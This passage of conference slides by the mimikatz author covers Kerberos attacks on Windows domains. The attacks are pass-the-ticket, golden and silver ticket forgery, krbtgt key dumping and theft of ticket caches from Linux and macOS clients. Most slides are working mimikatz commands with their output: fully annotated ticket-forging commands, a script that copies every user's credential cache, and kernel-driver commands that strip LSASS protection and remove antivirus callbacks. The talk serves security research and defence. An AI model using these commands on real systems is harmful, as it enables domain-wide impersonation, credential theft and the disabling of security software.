    Windows Kerberos Pass-the-ticket With TGT,to obtain some TGS… 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 21 des_cbc_md5 LSASS (kerberos) rc4_hmac_nt (NTLM/md4) aes128_hmac aes256_hmac KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage TGT
  • 22.
    Windows Kerberos Pass-the-ticket With oneTGS (or more…) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 22 des_cbc_md5 LSASS (kerberos) rc4_hmac_nt (NTLM/md4) aes128_hmac aes256_hmac KDC KDC TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage TGS
  • 23.
    Windows Kerberos Pass-the-ticket 20/11/2014 BenjaminDELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 23 .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Nov 17 2014 00:53:48) .## ^ ##. ## / ## /* * * ## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 15 modules * * */ mimikatz # kerberos::ptt krbtgt.kirbi cifs.kirbi 0 - File 'krbtgt.kirbi' : OK 1 - File 'cifs.kirbi' : OK mimikatz # kerberos::list [00000000] - 0x00000012 - aes256_hmac Start/End/MaxRenew: 19/11/2014 03:00:12 ; 19/11/2014 13:00:12 ; 26/11/2014 03:00:12 Server Name : krbtgt/LAB.LOCAL @ LAB.LOCAL Client Name : Administrator @ LAB.LOCAL Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; [00000001] - 0x00000012 - aes256_hmac Start/End/MaxRenew: 19/11/2014 03:00:52 ; 19/11/2014 13:00:12 ; 26/11/2014 03:00:12 Server Name : cifs/dc.lab.local @ LAB.LOCAL Client Name : Administrator @ LAB.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; mimikatz # kerberos::ptt tickets 0 - Directory 'tickets' (*.kirbi) 0 - File '[0;eb3a6]-0-0-40a50000-Administrator@cifs-dc.lab.local.kirbi' : OK 1 - File '[0;eb3a6]-0-1-40a50000-Administrator@ldap-dc.lab.local.kirbi' : OK 2 - File '[0;eb3a6]-2-1-40e10000-Administrator@krbtgt-LAB.LOCAL.kirbi' : OK
  • 24.
    Demo ! 20/11/2014 BenjaminDELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 24
  • 25.
    Normal Kerberos VSOverpass-the-Hash/Pass-the-Ticket know your enemy 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 25 Normal
  • 26.
    And now, I’mpretty sure you want some Golden Tickets?
  • 27.
    Golden Ticket A “GoldenTicket”, is a homemade ticket –It’s done with a lot of love –… and a key It’s not made by the KDC, so : –it’s not limited by GPO or others settings ;) –you can push whatever you want inside! –it’s smartcard independent (sorry CISO !) A “Silver Ticket” is also a kind of Golden Ticket ;) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 27
  • 28.
    Golden Ticket The entireKerberos security relies on poor little symmetric keys under “krbtgt” account – 128 bits for RC4/AES128 – 256 bits for AES256 And once generated, these keys never change for…. years… – Only changes during domain functional upgrade from NT5 -> NT6 – 2000/2003 to 2008/2012 • 2008 -> 2012 doesn’t change the value • the previous one (n-1) still valid… 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 28
  • 29.
    Golden Ticket If krbtgthash/keys lost – Domain dump • Password audit (legitimate use case) • Poorly redacted pentest report – yeah, really, this 502/krbtgt was a disabled account never used after all? – Other • Compromise File backup of the domain controller – Shadow copy trick – Recovery of backup tapes or access to backup file share Compromise of virtual machine infrastructure – Copy the drive image or a snapshot of the image 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 29
  • 30.
    Golden Ticket You canget “krbtgt” keys on a DC with mimikatz or other tools 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 30 mimikatz # privilege::debug Privilege '20' OK mimikatz # lsadump::lsa /name:krbtgt /inject Domain : LAB / S-1-5-21-2929287289-1204109396-1883388597 RID : 000001f6 (502) User : krbtgt * Primary LM : NTLM : 3f66b877d01affcc631f465e6e5ed449 * WDigest 01 a68990164b4dfefa47c2e998f19eb74c […] 29 75af20f460c10096e5ce62527ffe9c96 * Kerberos Default Salt : LAB.LOCALkrbtgt Credentials des_cbc_md5 : 62b915a4a1629861 * Kerberos-Newer-Keys Default Salt : LAB.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 466d9a5b9bc33cbfd566d5ad7635aedf7442f10116a68051a27fb53bbba3a19f aes128_hmac (4096) : 6dcc65d95e6f00cbedb65cc0892a5085 des_cbc_md5 (4096) : 62b915a4a1629861
  • 31.
    Golden Ticket From Will(@harmj0y): certainly a lab, certainly not a real life example, for sure… – https://twitter.com/harmj0y/status/520633805485654018 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 31
  • 32.
    Golden Ticket Even Microsoftwas a little bit curious about their own AD at our talk at BlueHat – https://twitter.com/JohnLaTwC/status/52106151 2203345920 Yeah, they have a funky monitoring… Btw, real command line is : – net user krbtgt /domain Do you know why MS don’t renew this account automatically ? or did not publish a recommendation to periodically renew krbtgt ? – In most cases, it works… – … most cases 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 32
  • 33.
    Golden Ticket krbtgt hashcan be used to generate arbitrary TGTs for use – Can make user a member of any group, even make it multiple users! • Even users and SIDs that do not exist – TGTs will only work for 20 minutes to get service tickets (however any service tickets will be good for 10 hours by default) • Any account can create / used spoofed ticket, doesn’t require elevated rights – Can be used to bypass account restrictions • Disabled / expired • Authentication silos • “protected users” group is just a group SID in the TGT – Create a trail of false events • Incident handlers rely on event logs • Easy to frame another user 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 33
  • 34.
    mimikatz :: GoldenTicket kerberos::golden /domain:lab.local <= domain name /sid:S-1-5-21-2929287289-1204109396-1883388597 <= domain SID /rc4:3f66b877d01affcc631f465e6e5ed449 <= NTLM/RC4 of KRBTGT /user:Administrator <= username you wanna be /id:500 <= RID of username (500 is THE domain admin) /groups:513,512,520,518,519 <= Groups list of the user (be imaginative) /ticket:Administrator.lab.kirbi <= the ticket filename (or /ptt) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 34
  • 35.
    PAC Signature -BlackHat erratum At BlackHat/Defcon, Skip Duckwall and I announced that to forge a TGS, we need 2 keys – krbtgt key – target key The krbtgt is needed to sign the PAC, to avoid alterations – How a remote service can check a signature without the Key ? • Remember ? Kerberos is SYMETRIC – Easy: it delegates PAC checks to the KDC… 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 35
  • 36.
    PAC Signature -MS014-68 Yes! Since 2 days you’ve heard about PAC signature check! w00t to Tom Maddock (@ubernerdom ?) for reporting a bug in PAC signature check (-1?) –Exploit guys, we need a POC ! This is not like a Golden Ticket – … or a Silver Ticket – MS014-68 rely on bug(s) in MS code… • Fixed in KB3011780 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 36
  • 37.
    PAC Signature Windows 2000Server and Windows XP do not validate the PAC when the application server is running under the local system context or has SeTcbPrivilege […] Windows Server 2003 does not validate the PAC when the application server is running under the local system context, the network service context, or has SeTcbPrivilege. […] Windows Server 2003 with SP1 does not validate the PAC when the application server is under the local system context, the network service context, the local service context, or has SeTcbPrivilege privilege. […] Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2 do not validate the PAC by default for services. Windows still validates the PAC for processes that are not running as services. PAC validation can be enabled when the application server is not running in the context of local system, network service, or local service; or it does not have SeTcbPrivilege […] 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 37 http://msdn.microsoft.com/library/cc224027.aspx#id2
  • 38.
    mimikatz :: Ticket So“in real life”, TGS only need the target key… no classic services will check signature…, let’s call them : Silver Tickets ! 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 38 Default lifetime Minimum number of KDC accesses Multiple targets Available with Smartcard Realtime check for restrictions (account disabled, logon hours...) Protected Users Check for Encryption (RC4/AES) Can be found in Is funky Normal 42 days 2 Yes Yes Yes Yes n.a. No Overpass-the- hash (Pass-the-key) 42 days 2 Yes No Yes Yes Active Directory Client No (ok, a little;)) Pass-the-Ticket (TGT) 10 hours 1 Yes Yes No (20mn after) No Client Memory Yes Pass-the-Ticket (TGS) 10 hours 0 No Yes No No Client Memory Yes Silver Ticket [30;60] days 0 No Yes No No n.a. Yes Golden Ticket 10 years 1 Yes Yes No (we can cheat) No n.a. Fuck, Yes!
  • 39.
    Silver Ticket How dowe make a Silver Ticket ? – Exactly such as a Golden Ticket, except the krbtgt key – Target name (server FQDN) – Service name – We must have the “Target Key” • From Client Memory • From Active Directory (ok, we can make Golden Ticket ;) • or... from the registry (even, offline !) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 39 mimikatz # lsadump::secrets Domain : CLIENT SysKey : 6bfd21f0eda0b20c96d902d3469909d6 Policy subsystem is : 1.13 LSA Key(s) : 1, default {adda624d-4d80-fbd7-1430-d1a54ddaa3ec} [00] {adda624d-4d80-fbd7-1430-d1a54ddaa3ec} e159ebc7330c153ca0def6705c5c3c9e963745c6a49bd0dbe93d426b71d1df6c Secret : $MACHINE.ACC cur/NTLM:c67d6f47929a19c574ee18539ae679f1/text:QbPxN=taXHczIGQ1u`]MG;HZjb]bDI^dbilGW?=up![Y_%:jrkFt*Ts19>'nE (]?XK8r-U#4sY_7KbeMBRn>+[7L7/ XHE1yeG?iaK@VTP_^34/,`kE6;z
  • 40.
    Silver Ticket Before that,who cares about this computer password ? – No… really ? – Yeah, like for the krbtgt account – At least, this time the password can change every 30 days... • But the n-1 still valid (so [30;60 days])… and the password still works if not changed… $MACHINE.ACC is the new krbtgt, localized to a computer/server – And it’s in the registry Silver ticket is the new Golden Ticket, localized to a target/service When you use a Service Account linked to a Kerberized Service, it can be localized to multiple targets (see SPN) – A lot of chances that you can find it in registry too ;) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 40
  • 41.
    mimikatz :: SilverTicket kerberos::golden /domain:lab.local <= domain name /sid:S-1-5-21-2929287289-1204109396-1883388597 <= domain SID /rc4:c67d6f47929a19c574ee18539ae679f1 <= NTLM/RC4 of the Target/Service /target:client.lab.local <= Target FQDN /service:cifs <= Service name /user:Administrator <= username you wanna be /id:500 <= RID of username (500 is THE domain admin) /groups:513,512,520,518,519 <= Groups list of the user (be imaginative) /ticket:cifs.client.kirbi <= the ticket filename (or /ptt) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 41
  • 42.
    Demo ! 20/11/2014 BenjaminDELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 42
  • 43.
    Kerberos…. 20/11/2014 Benjamin DELPY`gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 43
  • 45.
    Ubuntu Kerberos client(MIT) MIT client caches tickets in a file (one by user) -rw------- 1 gentilkiwi gentilkiwi 2740 nov. 19 23:45 krb5cc_1000 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 45
  • 46.
    Ubuntu Kerberos client(MIT) By default, one user can access ALL its tickets –Windows forbids TGT (by default) root can copy all tickets (of course, why not?) – sudo cp /tmp/krb5cc_* /mnt/hgfs/vmshare/ubuntu/ 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 46
  • 48.
    OSX Kerberos client(Heimdal) OSX can be joined in a domain, then access resources like Windows… – Tickets are not in a file like MIT by default (? and I don’t know Mac at all…?) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 48
  • 49.
    OSX Kerberos client(Heimdal) Like in Windows, local admins rule =) 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 49 #!/bin/sh DEST="/Volumes/VMware Shared Folders/vmshare/mac/`date +%Y%m%d%H%M%S`" mkdir -p "$DEST" ps auxwww | grep /loginwindow | grep -v "grep /loginwindow" | while read line do USER=`echo "$line" | awk '{print $1}'` PID=`echo "$line" | awk '{print $2}'` echo "$PID -> $USER" launchctl bsexec $PID kcc copy_cred_cache /tmp/$USER.$PID.ccache done cp /tmp/*.ccache "$DEST"
  • 50.
    mimikatz & ccachefiles kerberos::clist [/export] - Can split ccache in multiple “kirbi” files – To use with Pass-the-ticket by example 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 50 mimikatz # kerberos::clist "vmware-hostShared Foldersvmsharemac20141120003301administrator.66.ccache" /export Principal : (01) : administrator ; @ LAB.LOCAL Data 0 Start/End/MaxRenew: 19/11/2014 23:56:35 ; 20/11/2014 09:56:35 ; 26/11/2014 23:56:35 Service Name (02) : krbtgt ; LAB.LOCAL ; @ LAB.LOCAL Target Name (02) : krbtgt ; LAB.LOCAL ; @ LAB.LOCAL Client Name (01) : administrator ; @ LAB.LOCAL Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac aa63ef63ce29151c2f696d837c63ad5ab82a851aeeccc8a1e69a4425473a8aaf Ticket : 0x00000000 - null ; kvno = 2 [...] * Saved to file 0-40e10000-administrator@krbtgt-LAB.LOCAL.kirbi ! Data 1 * X-CACHECONF: entry? * Data 2 Start/End/MaxRenew: 19/11/2014 23:57:44 ; 20/11/2014 09:56:35 ; 01/01/1970 01:00:00 Service Name (03) : cifs ; dc.lab.local ; @ LAB.LOCAL Target Name (03) : cifs ; dc.lab.local ; @ LAB.LOCAL Client Name (01) : administrator ; @ LAB.LOCAL Flags 40250000 : name_canonicalize ; ok_as_delegate ; pre_authent ; forwardable ; Session Key : 0x00000012 - aes256_hmac ef7fddb42d1513c65978f433ad61bcddd78e664b723e560833c6ed4d2df211e1 Ticket : 0x00000000 - null ; kvno = 2 [...] * Saved to file 2-40250000-administrator@cifs-dc.lab.local.kirbi ! Data 3 * X-CACHECONF: entry? *
  • 51.
    mimikatz & ccachefiles kerberos::ptc - Can inject whole ccache in memory 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 51 mimikatz # kerberos::ptc "vmware-hostShared Foldersvmshareubuntukrb5cc_1000" Principal : (01) : Administrator ; @ LAB.LOCAL Data 0 Start/End/MaxRenew: 19/11/2014 23:42:20 ; 20/11/2014 09:42:20 ; 20/11/2014 23:42:17 Service Name (02) : krbtgt ; LAB.LOCAL ; @ LAB.LOCAL Target Name (02) : krbtgt ; LAB.LOCAL ; @ LAB.LOCAL Client Name (01) : Administrator ; @ LAB.LOCAL Flags 50e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; proxiable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 0c688277c6e5d6bf2fe766aef402998d619e24f93d83f7738e1383688b7cfda3 Ticket : 0x00000000 - null ; kvno = 2 [...] * Injecting ticket : OK Data 1 * X-CACHECONF: entry? * Data 2 Start/End/MaxRenew: 19/11/2014 23:45:26 ; 20/11/2014 09:42:20 ; 20/11/2014 23:42:17 Service Name (01) : cifs ; dc.lab.local ; @ LAB.LOCAL Target Name (01) : cifs ; dc.lab.local ; @ LAB.LOCAL Client Name (01) : Administrator ; @ LAB.LOCAL Flags 50a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; proxiable ; forwardable ; Session Key : 0x00000012 - aes256_hmac f529fcafb067a2f481239bad7e1fe956a874ac6669426d1df71b6c8ec16d537a Ticket : 0x00000000 - null ; kvno = 2 [...] * Injecting ticket : OK
  • 52.
    Demo ! 20/11/2014 BenjaminDELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 52
  • 53.
    Microsoft ? They makegood stuff, really! Windows 8.1 and backported to 7 – “Restricted Admin mode for Remote Desktop Connection” Prevent credentials to be sent on a remote server (network logon) Allow authentication by « pass-the-hash » & « pass-the-ticket » via CredSSP – “LSA Protection” Prevent access to LSASS process memory (protected process) Bypassed by a simple driver (this is a flag) – “Protected Users security group” No more NTLM, WDigest, CredSSP, no delegation or SSO... Kerberos only! Kerberos tickets can be stolen and injected… Windows 10 ??? – LSA credentials isolation (maybe) • Credentials outside the « main » OS ; • Crypto operation via RPC / LPC • Performance ? By default ? 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 53
  • 54.
    Kernel time Mimikatz includesa driver to play with the Kernel part of Windows… It’s signed with an expired certificate…. So it works, even in x64 So I can unprotect protected process  …or protect unprotected process (?) !processprotect /process:lsass.exe /remove 20/11/2014 Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 54
  • 55.
    Contre-rump express newsoft time… 20/11/2014Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 55
  • 56.
    “Killing any securityproduct … using a Mimikatz undocumented feature” 20/11/2014 BBenjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 56 .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Nov 20 2014 01:35:31) .## ^ ##. ## / ## /* * * ## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 15 modules * * */ mimikatz # !+ [*] mimikatz driver not present [+] mimikatz driver successfully registered [+] mimikatz driver ACL to everyone [+] mimikatz driver started mimikatz # !notifprocess [00] 0x82913758 [ntkrnlpa.exe + 0x000be758] [01] 0x88AE0D74 [MpFilter.sys + 0x0000ad74] [02] 0x88D799D8 [ksecdd.sys + 0x0000c9d8] [03] 0x88D84D96 [cng.sys + 0x00004d96] [04] 0x88E9BFA5 [tcpip.sys + 0x00081fa5] [05] 0x82F14DFC [CI.dll + 0x0000edfc] [06] 0xA1C341D9 [peauth.sys + 0x0000c1d9] mimikatz # !notifobject […] * Process * Callback [type 3] - Handle 0x89A54150 (@ 0x89A54160) PreOperation : 0x88AF9FFE [MpFilter.sys + 0x00023ffe] Open - 0x82A65E93 [ntkrnlpa.exe + 0x00210e93] mimikatz # !notifprocessremove 0x88AE0D74 Target = 0x88AE0D74 Removed : 0x88AE0D74 [MpFilter.sys + 0x0000ad74] mimikatz # !notifobjectremove 0x89A54160 Target = 0x89A54160 * Callback [type 3] - Handle 0x89A54150 (@ 0x89A54160) PreOperation : 0x88AF9FFE [MpFilter.sys + 0x00023ffe] * Callback [type 3] - Handle 0x89A54150 (@ 0x89A54160) PreOperation : 0x85D2E048 [ ? ]
  • 57.
    That’s all Folks! 20/11/2014Benjamin DELPY `gentilkiwi` @ No Such Con benjamin@gentilkiwi.com ; blog.gentilkiwi.com 57 blog http://blog.gentilkiwi.com mimikatz http://blog.gentilkiwi.com/mimikatz source https://github.com/gentilkiwi/mimikatz contact @gentilkiwi / benjamin@gentilkiwi.com